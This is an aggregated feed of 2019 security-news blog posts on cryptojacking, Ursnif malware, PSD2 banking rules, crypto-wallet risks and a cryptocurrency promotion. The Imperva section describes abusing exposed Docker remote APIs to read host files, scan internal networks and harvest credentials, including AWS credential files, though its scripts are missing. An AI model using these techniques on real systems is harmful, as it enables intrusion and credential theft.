In hindsight, the Blockchain industry has gone a wrong path, trading freedom, privacy and technological advancement for purposeless crowdfunding and marketing with exaggerated budgets. That path made the whole world believe that cryptocurrencies and Blockchain are synonymous to the word “scam.” Concentrating efforts on marketing only leads to dramatic drawbacks in technological progress, and unfortunately, more than 80% of the ICO projects became scam or dead in just a couple of years.

That leaves everyone thinking that maybe cutting-edge designs, dozens of trendy conferences, excellent whitepapers are not things that we should pay the most of our attention to? Technology is what makes the project truly valuable, and Ilcoin crypto shows all signs of becoming a bitcoin alternative in the next few years. And maybe the old paradigm that was in Bitcoin creator’s mind has to return in the new light of progress, combating existing and future threats. It won’t happen overnight, but the new foundation is already built, and the paradigm shift will occur soon.

To learn more about IlCoin and to keep up-to-date with new developments and exchange listings, you can check out the company’s website or join its Telegram community.

The post IlCoin vs Bitcoin – a paradigm shift in the pursuit of technological sustainability appeared first on TechWorm.

This Week in Security News: Radio Frequency Technology and Telecom Crimes

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how radio frequency technology is putting industrial organizations at risk. Also, understand the threat landscape of telecommunications and how to prepare for future threats.

Read on:

How Radio Frequency Technology is Putting the Industrial Sector at Risk

Leaders of industrial organizations must understand that the devices and systems employees leverage to control processes could open their business up to specific vulnerabilities. 

Microsoft warns Windows 7 users of looming end to security updates

Microsoft has rolled out a patch that will warn Windows 7 users that security updates will come to an end on January 14, 2020. At that time, the software giant will no longer roll out fixes for security flaws and vulnerabilities.

Attackers Targeting Cloud Infrastructure for Their Cryptocurrency-Mining Operations

With the rise of cryptocurrency-mining malware over the past couple of years, cybercriminals are constantly trying different kinds of monetization schemes. 

Email Scammers Stole More Than $150K from Defense Contractors and a University, FBI Says

Cybercriminals defrauded two defense contractors and a university out of more than $150,000 through email scams last year, the FBI has warned companies.

Global Telecom Crime Undermining Internet Security: Cyber-Telecom Crime Report

As the field of telecommunication continues to evolve, so should its security. Understanding its current threat landscape can help reduce the impact of crimes and prepare us for future threats. 

Half of Organizations Lack the Security Talent Needed to Remain Secure

According to the latest Trend Micro figures, organizations worldwide are faced with an ‘ongoing and often detrimental’ shortage of cybersecurity talent.

New Mirai Botnet Variant Targets IoT TV, Presentation Systems

Trend Micro researchers found a new Mirai variant in the wild targeting smart signage TV and wireless presentation systems commonly used by businesses. 

Aluminum Maker Hydro Battles to Contain Ransomware Attack

Norsk Hydro, one of the world’s largest aluminum producers, battled to contain a cyber-attack that halted parts of its production.

What You Need to Know About the LockerGoga Ransomware

The systems of Norwegian aluminum manufacturing company Norsk Hydro were reportedly struck last Tuesday, March 19, by LockerGoga ransomware. 

Round 4: Hacker Returns and Puts 26 Million User Records for Sale on the Dark Web

A hacker who previously put more than 840 million user records up for sale has returned with a fourth round of hacked data from six companies, totaling 26.42 million user records. 

Trump’s Cybersecurity Budget Emphasizes DOD While Spreading Cuts Elsewhere

Federal cybersecurity spending would increase by about 5 percent overall in fiscal 2020 under President Donald Trump’s proposed budget, with the Department of Defense getting a big boost and many civilian agencies seeing small cuts or relatively flat funding.

Are you surprised with the growth and evolution of telecom technology? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Radio Frequency Technology and Telecom Crimes appeared first on .

Monart – A Unique Project Combining Both Art and Cryptocurrency

Blockchain has become a big buzz word for businesses looking to transform certain industries.  Although J.P. Morgan’s Jamie Dimon gained notoriety for bashing Bitcoin as a fraud, […]

The post Monart – A Unique Project Combining Both Art and Cryptocurrency appeared first on Hacked: Hacking Finance.

Webroot Blog: Post Coinhive, What’s Next for Cryptojacking?

Reading Time: ~2 min.

In late February, the notorious cryptojacking script engine called Coinhive abruptly announced the impending end to its service. The stated reason: it was no longer economically viable to run.

Coinhive became infamous quickly following its debut as an innovative javascript-based cryptomining script in 2018. While Coinhive maintained that its service was born out of good intentions—to offer website owners a means to generate revenue outside of hosting ads—it took cybercriminals no time at all to create cryptojacking attack campaigns. Cryptojacking became incredibly popular in 2018, infecting millions of sites (and cloud systems among the likes of Tesla) and netting criminals millions in cryptocurrency at the expense of their victims.

Source: Coinhive [dot] com

I honestly did not see this happening, but I do understand. It is reasonable to think that Coinhive didn’t intend for their creation to be abused by criminals. However, they have still kept 30 percent of ALL the earnings generated by their script, one that was often found running illegally on hijacked sites. Most of that profit came from illicit mining, which has earned Coinhive a lot of negative press.

Additionally, 2018 was a terrible year in terms of the US-dollar value of Monero (XMR), which means their service is significantly less profitable now, relative to what it once was. Combined with the fact that the XMR development team hard-forked the coin and changed the difficulty of the hashrate, this means Coinhive is making very little money from legitimate miners.

Coinhive created this service so legitimate domain owners could host their script and generate enough revenue to replace ads. Ads are annoying and I believe this innovation was aimed at attempting to fix that problem. But the ultimate result was a bunch of criminals breaking into other people’s domains and injecting them with Coinhive scripts that essentially stole from visitors to that domain. Without consent, millions of victims’ computers were subject to maximum hardware stress for extended periods of time, all so some criminals could make a few pennies worth of cryptocurrency per computer.

Would you continue to operate a startup business in which most of the money you earned was a cut of criminal activity—stealing from victims in the form of an increased power bill? Maybe a year ago, when the hashing difficulty was easier (you earned more XMR) and XMR was worth 10 times what it’s worth now, it might have been easier to “sleep at night” but now it probably just isn’t worth it.

Even before this news, there were plenty of other copy cats—Cryptoloot, JSEcoin, Deepminer, and others—so criminals have plenty of similar services to choose from. At the time of its shutdown, Coinhive had about around 60% share of all cryptojacking campaigns, though we saw this market dominance reach as high as 80% last year. I anticipate these other services stand to take larger shares of cryptojacking revenue now that the largest player has left. We might even see a new competitor service emerge to challenge for cryptojacking dominance.

Stay tuned to the Webroot blog for future developments in cryptojacking.

The post Post Coinhive, What’s Next for Cryptojacking? appeared first on Webroot Blog.



Webroot Blog

Ransomware’s New Normal

GandCrab’s evolution underscores a shift in ransomware attack methods. Don’t be fooled by the drop in overall ransomware attacks this past year: Fewer but more targeted and lucrative campaigns against

The post Ransomware’s New Normal appeared first on The Cyber Security Place.

Threat Actor Targets Japanese Users With New Ursnif Variant

Security researchers discovered an attack campaign targeting Japanese users with a new variant of Ursnif banking malware.

First observed in the beginning of 2019, Cybereason reported that the campaign begins with a phishing email that attempts to trick unsuspecting Japanese users into enabling a weaponized Microsoft Office document’s embedded macros. This results in the execution of several PowerShell commands that, in turn, download an image file. The image uses steganography to hide Bebloh, malware that ultimately pulls down Ursnif’s loader from the attacker’s command-and-control (C&C) server.

The campaign’s final payload differs from previous variants in that it:

  • Creates “last-minute persistence” the moment before an infected system shuts down and injects its core dynamic link library (DLL) into explorer.exe once the machine reboots;
  • Comes with updated modules for stealing credentials from Outlook, Mozilla Thunderbird and Internet Explorer;
  • Has a new module that enables it to steal from cryptocurrency wallets and disk encryption software; and
  • Uses yet another module to evade PhishWall, a Japanese security product.

A Busy Few Months for Ursnif

This isn’t the first time cyberattackers have targeted Japanese users with Bebloh and Ursnif. In August 2018, for instance, Trend Micro detected a campaign in which threat actors used the Cutwail botnet and abused internet query files to distribute the threats. Just two months later, Trend Micro analyzed a similar operation spreading both types of malware.

Ursnif has also been busy without Bebloh. For example, Carbon Black reported on an attack campaign on Jan. 24 in which malicious actors used macros and a PowerShell script to download the malware along with GandCrab ransomware. That same day, Cisco Talos uncovered a fileless operation involving Ursnif. Then, the following month, Bromium detected a sample of the malware hidden within an image of Mario, the popular Nintendo character.

How to Detect Banking Malware Campaigns

Security professionals can defend against campaigns that spread Ursnif and other banking malware by using ahead-of-threat detection to analyze the WHOIS information of potential phishing sites. Organizations should also make use of analytics tools such as VBA editor to inspect the macro code in suspicious Office documents.

The post Threat Actor Targets Japanese Users With New Ursnif Variant appeared first on Security Intelligence.

Explained: Payment Service Directive 2 (PSD2)

Payment Service Directive 2 (PSD2) is the implementation of a European guideline designed to further harmonize money transfers inside the EU. The ultimate goal of this directive is to simplify payments across borders so that it’s as easy as transferring money within the same country. Since the EU was set up to diminish the borders between its member states, this make sense. The implementation offers a legal framework for all payments made within the EU.

After the introduction of PSD in 2009, and with the Single Euro Payments Area (SEPA) migration completed, the EU introduced PSD2 on January 13, 2018. However, this new harmonizing plan came with a catch— the use of new online payment and account information services provided by third parties, such as financial institutions, who needed to be able to access the bank accounts of EU users. While they first need to obtain users’ consent to do so, we all know consent is not always freely given or with a full understanding of the implications. Still, it must be noted: Nothing will change if you don’t give your consent, and you are not obliged to do so.

Which providers

Before these institutions are allowed to ask for consent, they have to be authorized and registered under PSD2. The PSD2 already sets out information requirements for the application as payment institution and for the registration as account information services provider (AISP). The European Banking Authority (EBA) published guidelines on the information to be provided by applicants intending to obtain authorization as payment and electronic money institutions, as well as to register as an AISP.

From the pages of the Dutch National Bank (De Nederlandsche Bank):

“In this register are also (foreign) Account information service providers based upon the European Passport. These Account information service providers are supervised by the home supervisor. Account information service providers from other countries of the European Economic Area (EEA) could issue Account information services based upon the European Passport through an Agent in the Netherlands. DNB registers these agents of foreign Account information service providers without obligation to register. The registration of these agents are an extra service to the public. However the possibility may exist that the registration of incoming agents differs from the registration of the home supervisor.”

So, an AISP can obtain a European Passport to conduct its services across the entire EU, while only being obligated to register in its country of origin. And even though the European Union is supposed to be equal across the board, the reality is, in some countries, it’s easier to worm yourself into a comfortable position than in others.

Access to bank account = more services

Wait a minute. What exactly does all of this mean? Third parties often live under a separate set of rules and are not always subject to the same scrutiny. (Case in point: AISPs can move to register in “easier” countries and get away with much more.) So while that offers an AISP better flexibility to provide smooth transfer services, it would also allow those payment institutions to offer new services based on their view into your bank account. That includes a wealth of information, such as:

  • How much money is coming into and out of the account each month
  • Spending habits: what you spend money on and where you spend it
  • Payment habits: Are you paying bills way ahead of deadline or tardy?

AISPs can check your balance, request your bank to initiate a payment (transfer) on your behalf, or create a comprehensive overview of your balances for you.

Simple example: There is an AISP service that keeps tabs on your payments and income and shows you how much you can spend freely until your next payment is expected to come in. This is useful information to have when you are wondering if you can make your money last until the end of the month if you buy that dress.

However, imagine this information in the hands of a commercial party that wants to sell you something. They would be able to figure out how much you are spending with their competitors and make you a better offer. Or pepper you with ads tailored to your spending habits. Is that a problem? Yes, because why did you choose your current provider in the first place? Better service or product? Customer friendliness? Exactly what you needed? In short, the competitor might use your information to help themselves, and not necessarily you.

What is worrying about PSD2?

Consumer consent is a good thing. But if we can learn from history, as we should, it will not be too long before consumers are being tricked into clicking a big green button that gives a less trustworthy provider access to their banking information. Maybe they don’t even have to click it themselves. We can imagine Man-in-the-Middle attacks that sign you up for such a service.

Any offer of a service that requires your consent to access banking information should be carefully examined. How will AISPs that work for free make money? Likely by advertising to you or selling your data.

And then there is the possibility for “soft extortion,” like a mortgage provider that doesn’t want to do business with you unless you provide them with the access to your banking information. Or will offer you a better deal if you do.

In all of these scenarios, consent was given in one way or another, but is the deal really all that beneficial for the customer?

What we’d like to see

Some of the points below may already be under consideration in some or all of the EU member states, but we think they offer a good framework for the implementation of these new services.

  • We only want AISPs that work for the consumer and not for commercial third parties. In fairness, the consumer will pay the AISP for their services so that abuse or misuse of free product business models does not take place.
  • AISPs that want to do business in a country should be registered in that country, as well as in other countries where they want to do business.
  • AISPs should be constantly monitored, with the option to revoke their license if they misbehave. Note that GDPR already requires companies to delete data after services have stopped or when consent is withdrawn.
  • Access to banking information should not be used as a requirement for unrelated business models, or be traded for a discount on certain products.
  • GDPR regulations should be applied with extra care in this sensitive area. Some data- and privacy-related bodies have already expressed concerns about the discrepancies between GDPR and PSD2, even though they come from the same source.
  • Obligatory double-check through another medium by the AISP whether the customer has signed up out of their own free will, with a cooling-off period during which they can withdraw the permission.

Would anyone consent to PSD2 access?

For the moment, it’s hard to imagine a reason for allowing another financial institution or other business access to personal banking information. But despite the obvious red flags, it’s possible that people might be convinced with discounts, denials of service, or appealing benefits to give their consent.

And some of our wishes could very well be implemented as some kinks are still being ironed out. The Dutch Data Protection Authority (DPA) has pointed out that there are discrepancies between GDPR and PSD2 and expressed their concern about them. The DPA acknowledges this in their recommendation on the Implementation Act, and most recently in the Implementation Decree.

In both recommendations, the DPA concludes, in essence, that the GDPR has not been taken in consideration adequately in the course of the Dutch implementation of PSD2. The same may happen in other EU member states. Of course, the financial world tells us that licenses will not be issued to just anybody, but the public has not entirely forgotten the global 2008 banking crisis.

On top of that, there are major lawsuits in progress against insurance companies and other companies that sold products constructed in a way the general public could not possibly understand. These products are now considered misleading, and some even fraudulent. To put it mildly, the trust of the European public in financials is not high at the moment.

And we are not just looking at traditional financials.

Did you know that Google has obtained an eMoney license in Lithuania and that Facebook did the same in Ireland?

Are you worried now? Let me explain that all of these concerns have been brought up before, and the general consensus is that the regulations are strict enough to warrant an introduction of PSD2 that will only allow trustworthy partners which have been vetted and will be monitored by the authorities.

Nevertheless, you can rest assured that we will keep an eye on this development. When the times comes that PSD2 is introduced to the public, it might also turn out to be a subject that phishers are interested in. We can already imagine the “Thank you for allowing us to access your bank account; click here to revoke permission” email buried in junk mail.

Stay safe, everyone!

The post Explained: Payment Service Directive 2 (PSD2) appeared first on Malwarebytes Labs.

Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners

Docker is a technology that allows you to perform operating system level virtualization. An incredible number of companies and production hosts are running Docker to develop, deploy and run applications inside containers.

You can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk — if the control gets into the wrong hands, your entire network can be in danger.

In February, a new vulnerability (CVE-2019-5736) was discovered that allows you to gain host root access from a docker container.  The combination of this new vulnerability and exposed remote Docker API can lead to a fully compromised host.

According to Imperva research, exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known-albeit-rising cryptocurrency for their financial benefit.

In this post you will learn about:

  • Publicly exposed Docker hosts we found
  • The risk they can put organizations in
  • Protection methods

Publicly Accessible Docker Hosts

The Docker remote API listens on ports 2735 / 2736. By default, the remote API is only accessible from the loopback interface (“localhost”, “127.0.0.1”), and should not be available from external sources. However, as with other cases —  for example, publically-accessible Redis servers such as RedisWannaMine —  sometimes organizations are misconfiguring their services, allowing easy access to their sensitive data.

We used the Shodan search engine to find open ports running Docker.

We found 3,822 Docker hosts with the remote API exposed publicly.

We wanted to see how many of these IPs are really exposed. In our research, we tried to connect to the IPs on port 2735 and list the Docker images. Out of 3,822 IPs, we found approximately 400 IPs are accessible.

Red indicates Docker images of crypto miners, while green shows production environments and legitimate services  

We found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction.  

Other hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.

Hacking with the Docker Remote API

The possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:

  • Launch more attacks with masked IPs
  • Create a botnet
  • Host services for phishing campaigns
  • Steal credentials and data
  • Pivot attacks to the internal network

Here are some script examples for the above attacks.

1. Access files on the Docker host and mounted volumes

By starting a new container and mounting it to a folder in the host, we got access to other files in the Docker host:


It is also possible to access data outside of the host by looking on container mounts. Using the Docker inspect command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also change the data.

2. Scan the internal network

When a container is created in one of the predefined Docker network “bridge” or “host,” attackers can use it to access hosts the Docker host can access within the internal network. We used nmap to scan the host network to find services. We did not need to install it, we simply used a ready image from the Docker Hub:

It is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our Redis WannaMine post.

3. Credentials leakage

It is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories.

We found 3 simple ways to detect credentials using the Docker remote API:

Docker inspect command

“env” command on a container

Docker inspect doesn’t return all environment variables. For example, it doesn’t return ones which were passed to docker run using the –env-file argument. Running “env” command on a container will return the entire list:

Credentials files on the host

Another option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like “~/.aws/credentials”.

4. Data Leakage

Here is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:

Wrapping Up

In this post, we saw how dangerous exposing the Docker API publicly can be.

Exposing Docker ports can be useful, and may be required by third-party apps like ‘portainer’, a management UI for Docker.

However, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on Securing Docker remote daemon.

Imperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:

  • What do I have?
  • Is it secure?

The tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please contact Imperva sales.

We also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from being secure. Instead of using environment variables, it is possible to read the credentials on runtime (depends on your environment). In AWS you can use roles and KMS. In other environments, you can use 3rd party tools like Vault or credstash.

The post Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners appeared first on Blog.

Cyber Security Week in Review (March 1)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Drupal patched a “highly critical” vulnerability that attackers exploited to deliver cryptocurrency miners and other malware. Some field types in the content management system did not properly sanitize data from non-form sources, which allowed an attacker to execute arbitrary PHP code. Users need to update to the latest version of Drupal to patch the bug. Snort rule 49257 also protects users from this vulnerability.
  • Cryptocurrency mining tool Coinhive says it’s shutting down, but not due to malicious use. Attackers have exploited the tool for months as part of malware campaigns, stealing computing power from users to mine cryptocurrencies. However, the company behind the miner says it’s shutting down because it’s no longer economically viable to run. Snort rules 44692, 44693, 45949 - 45952, 46365 - 46367, 46393, 46394 and 47253 can protect you against the use of Coinhive. 
  • Several popular apps unknowingly share users’ personal information with Facebook. In many cases, this can include personal health information, including females’ menstruation cycle, users’ heart rate and recent home buying purchases. The data is sent to Facebook even if the user doesn’t have a Facebook profile. 

From Talos


  • Attackers are increasingly going after unsecured Elasticsearch clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines.
  • The latest Beers with Talos podcast covers the importance of privacy. Special guest Michelle Dennedy, Cisco’s chief privacy officer, talks about recent initiatives the company is taking on and how other organizations can do better. 

Vulnerability roundup


  • A flaw in the Ring doorbell could allow an attacker to spy on users’ homes and even inject falsified video. The vulnerability could open the door for a man-in-the-middle attack against the smart doorbell app since the sound and video recorded by the doorbell is transmitted in plaintext. 
  • Cisco disclosed multiple vulnerabilities in a variety of its products, including severe bugs in routers. The company urged users of its firewall routers and VPN to patch immediately Thursday, warning against a remote code execution vulnerability. There’s also a certificate validation vulnerability in Cisco Prime Infrastructure that could allow an attacker to perform a man-in-the-middle attack against the SSL tunnel between Cisco’s Identity Service Engine and Prime Infrastructure. Snort rule 49240 protects users from the Prime Infrastructure vulnerability. 
  • New flaws in 4G and 5G could allow attackers to track users’ location and intercept phone calls. A new research paper discloses what is believed to be the first vulnerabilities that affect both broadband technologies. 

The rest of the news


  • A new service from Cisco Duo launched a new product recently to scan Google Chrome extensions. CRXcavator provides customers and users by scanning the Chrome store and then delivering reports on different extensions based on their permissions required and potential use of those permissions. 
  • Google is under fire for allegedly forgetting to inform users of a microphone inside of its Nest smart hub. While the company says it was never supposed to be a secret, users, security researchers and even politicians now are questioning why the microphone was installed in the first place. 
    • Talos Take: "To be clear, because some news outlets have reported this microphone as being present in the Nest THERMOSTAT.  It is NOT present in the thermostat, it’s present in the Smart Hub, which is the centerpiece of their home security solution," Joel Esler, senior manager, Communities Division.


Hackers Favorite CoinHive Cryptocurrency Mining Service Shutting Down

Coinhive, a notorious in-browser cryptocurrency mining service popular among cybercriminals, has announced that it will discontinue its services on March 8, 2019. Regular readers of The Hacker News already know how Coinhive's service helped cyber criminals earn hundreds of thousands of dollars by using computers of millions of people visiting hacked websites. <!-- adsense --> For a brief

Hackers Actively Exploiting Latest Drupal RCE Flaw Published Last Week

Cybercriminals have actively started exploiting an already patched security vulnerability in the wild to install cryptocurrency miners on vulnerable Drupal websites that have not yet applied patches and are still vulnerable. Last week, developers of the popular open-source content management system Drupal patched a critical remote code execution (RCE) vulnerability (CVE-2019-6340) in Drupal

Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Cryptocurrency and Blockchain Networks: Facing New Security Paradigms

On Jan. 22, FireEye participated in a panel focused on cryptocurrencies and blockchain technology during the World Economic Forum. The panel addressed issues raised in a report developed by FireEye, together with our partner Marsh & McLennan (a global professional services firm) and Circle (a global crypto finance company). The report touched on some of the security considerations around crypto-assets – today and in the future, and in this blog post, we delve deeper into the security paradigms surrounding cryptocurrencies and blockchain networks.

First, some background that will provide context for this discussion.

Cryptocurrencies – A Primer

By its simplest definition, cryptocurrency is digital money that operates on its own decentralized transaction network. When defined holistically, many argue that cryptocurrencies and their distributed ledger (blockchain) technology is powerful enough to radically change the basic economic pillars of society and fundamentally alter the way our systems of trust, governance, trade, ownership, and business function. However, the technology is new, subject to change, and certain headwinds related to scalability and security still need to be navigated. It is safe to assume that the ecosystem we have today will evolve. Since the final ecosystem is yet to be determined, as new technology develops and grows in user adoption, the associated risk areas will continually shift – creating new cyber security paradigms for all network users to consider, whether you are an individual user of cryptocurrency, a miner, a service-provider (e.g., exchange, trading platform, or key custodian), a regulator, or a nation-state with vested political interest.

Malicious actors employ a wide variety of tactics to steal cryptocurrencies. These efforts can target users and their wallets, exchanges and/or key custodial services, and underlying networks or protocols supporting cryptocurrencies. FireEye has observed successful attacks that steal from users and cryptocurrency exchanges over the past several years. And while less frequent, attacks targeting cryptocurrency networks and protocols have also been observed. We believe cryptocurrency exchanges and/or key custodial services are, and will continue to be, attractive targets for malicious operations due to the potentially large profits, their often-lax physical and network security, and the lack of regulation and oversight.

This blog post will highlight some of the various risk areas to consider when developing and adopting cryptocurrency and blockchain technology.

Wallet & Key Management

Public and Private Keys

There are two types of keys associated with each wallet: a public key and a private key. Each of these keys provides a different function, and it is the security of the private key that is paramount to securing cryptocurrency funds.

The private key is a randomly generated number used to sign transactions and spend funds within a specific wallet, and the public key (which is derived from the private key) is used to generate a wallet address to which they can receive funds.


Figure 1: Private key, public key, and address generation flow

The private key must be kept secret at all times and, unfortunately, revealing it to third-parties (or allowing third-parties to manage and store private keys) increases convenience at the expense of security. In fact, some of the most high-profile exchange breaches have occurred in large part due to a lack of operational controls relating to the storage of private keys. Maintaining the confidentiality, integrity, and availability of private keys requires fairly robust controls.

However, from an individual user perspective, a large number of user-controlled software wallet solutions store the private and public keys in a wallet file on the user’s hard drive that is located in a well-known directory, making it an ideal target for actors that aim to steal private keys. Easily available tools such as commercial keyloggers and remote access tools (RATs) can be used to steal funds by stealing (or making copies of) a user’s wallet file. FireEye has observed myriad malware families, traditionally aimed at stealing banking credentials, incorporate the ability to target cryptocurrency wallets and online services. FireEye Intelligence subscribers may be familiar with this already, as we’ve published about these malware families use in targeting cryptocurrency assets on our FireEye Intelligence Portal. The following are some of the more prominent crimeware families we have observed include such functionality:

  • Atmos
  • Dridex
  • Gozi/Ursnif
  • Ramnit
  • Terdot
  • Trickbot
  • ZeusPanda/PandaBot
  • IcedID
  • SmokeLoader
  • Neptune EK
  • BlackRuby Ransomware
  • Andromeda/Gamarue
  • ImminentMonitor RAT
  • jRAT
  • Neutrino
  • Corebot

Wallet Solutions

By definition, cryptocurrency wallets are used to store a user’s keys, which can be used to unlock access to the funds residing in the associated blockchain entry (address). Several types of wallets exist, each with their own level of security (pros) and associated risks (cons). Generally, wallets fall into two categories: hot (online) and cold (offline).

Hot Wallets

A wallet stored on a general computing device connected to the internet is often referred to as a “hot” wallet. This type of storage presents the largest attack surface and is, consequently, the riskiest way to store private keys. Types of hot wallets typically include user-controlled and locally stored wallets (also referred to as desktop wallets), mobile wallets, and web wallets. If remote access on any hot wallet device occurs, the risk of theft greatly increases. As stated, many of these solutions store private keys in a well-known and/or unencrypted location, which can make for an attractive target for bad actors. While many of these wallet types offer the user high levels of convenience, security is often the trade-off.

Wallet Type

Examples

Desktop

  • Bitcoin Core
  • Atomic
  • Exodus
  • Electrum
  • Jaxx

Mobile

  • BRD
  • Infinito
  • Jaxx
  • Airbitz
  • Copay
  • Freewallet

Web

  • MyEtherWallet
  • MetaMask
  • Coinbase
  • BTC Wallet
  • Blockchain.info

Table 1: Types of hot wallets

If considering the use of hot wallet solutions, FireEye recommends some of the following ways to help mitigate risk:

  • Use two-factor authentication when available (as well as fingerprint authentication where applicable).
  • Use strong passwords.
  • Ensure that your private keys are stored encrypted (if possible).
  • Consider using an alternative or secondary device to access funds (like a secondary mobile device or computer not generally used every day) and kept offline when not in use.
Cold Wallets

Offline, also called cold wallets, are those that generate and store private keys offline on an air-gapped computer without network interfaces or connections to the outside internet. Cold wallets work by taking the unsigned transactions that occur online, transferring those transactions offline to be verified and signed, and then pushing the transactions back online to be broadcasted onto the Bitcoin network. Managing private keys in this way is considered to be more secure against threats such as hackers and malware. These types of offline vaults used for storing private keys is becoming the industry security standard for key custodians such as Coinbase, Bittrex, and other centralized cryptocurrency companies. Even recently, Fidelity Investments released a statement regarding their intentions to play an integral part of the Bitcoin’s custodial infrastructure landscape.

"Fidelity Digital Assets will provide a secure, compliant, and institutional-grade omnibus storage solution for bitcoin, ether and other digital assets. This consists of vaulted cold storage, multi-level physical and cyber controls – security protocols that have been created leveraging Fidelity’s time-tested security principles and best practices combined with internal and external digital asset experts."

-Fidelity Investments                                

While more security-conscious exchanges employ this type of key storage for their users, cold wallets are still susceptible to exploitation:

  • In November 2017, ZDnet published an article describing four methods hackers use to steal data from air-gapped computers through what they call “covert channels.” These channels can be broken down into four groups:
    • Electromagnetic
    • Acoustic
    • Thermal
    • Optical
  • In addition to those four types of attacks, WikiLeaks revealed, as part of its ongoing Vault 7 leak, a tool suite (dubbed Brutal Kangaroo, formerly EZCheese) allegedly used by the CIA for targeting air-gapped networks.
  • In February 2018, security researchers with the Cybersecurity Research Center at Israel's Ben-Gurion University made use of a proof-of-concept (PoC) malware that allowed for the exfiltration of data from computers placed inside a Faraday cage (an enclosure used to block electromagnetic fields). According to their research, attackers can exfiltrate data from any infected computer, regardless if air-gapped or inside a Faraday cage. The same group of researchers also revealed additional ways to exploit air-gapped computers:
    • aIR-Jumper attack that steals sensitive information from air-gapped computers with the help of infrared-equipped CCTV cameras that are used for night vision
    • USBee attack that can be used steal data from air-gapped computers using radio frequency transmissions from USB connectors
    • DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer
    • BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys
    • AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes
    • Fansmitter technique that uses noise emitted by a computer fan to transmit data
    • GSMem attack that relies on cellular frequencies
    • PowerHammer, a malware that leverages power lines to exfiltrate data from air-gapped computers.
Hardware Wallets

Hardware wallets are typically a small peripheral device (such as USB drives) used to generate and store keys, as well as verify and sign transactions. The device signs the transactions internally and only transmits the signed transactions to the network when connected to a networked computer. It is this separation of the private keys from the vulnerable online environment that allows a user to transact on the blockchain with reduced risk.

